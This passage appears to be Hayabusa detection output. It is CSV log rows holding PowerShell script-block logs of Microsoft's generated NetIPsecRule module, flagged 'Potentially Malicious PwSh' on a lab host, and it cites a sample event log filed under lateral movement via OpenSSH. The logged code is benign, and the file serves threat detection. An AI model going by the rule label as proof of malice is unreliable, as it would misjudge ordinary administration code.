= $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 
'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw 
} } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, 
